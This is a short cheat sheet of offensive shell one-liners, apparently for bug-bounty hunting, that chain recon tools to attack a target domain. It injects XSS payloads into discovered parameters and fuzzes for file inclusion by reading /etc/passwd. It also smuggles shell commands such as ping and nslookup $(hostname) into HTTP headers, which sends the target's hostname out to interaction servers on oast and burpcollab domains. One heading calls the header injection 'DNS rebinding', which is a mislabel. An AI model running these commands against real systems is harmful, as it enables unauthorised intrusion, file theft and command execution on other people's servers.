oneliner

assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
 
assetfinder https://exmple.com | gau --subs https://exmple.com  | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
  
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
  
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/101.0.4951.64 Safari/537.36" -H "Host: cali877mkd6a35j9596ghmbkiscuwm4ue.oast.pro" -H "X-Forwarded-Host: 8.8.8.8;ping -c 3 cali877mkd6a35j9596gns3bij5s5n65y.oast.pro" -H "referer: 8.8.8.8;nslookup $(hostname).cali877mkd6a35j9596g3a5t3jjw1hoh4.oast.pro" -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt -fc 405 -mc 200,403 -ac true; done

assetfinder https://exmple.com -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc | nuclei -t /home/0x/.local/nuclei-templates -interactions-eviction 60 -interactions-poll-duration 5 -iserver cakrmf7mkd652id2opmgfp8oeewx1e3s7.oast.live -follow-redirects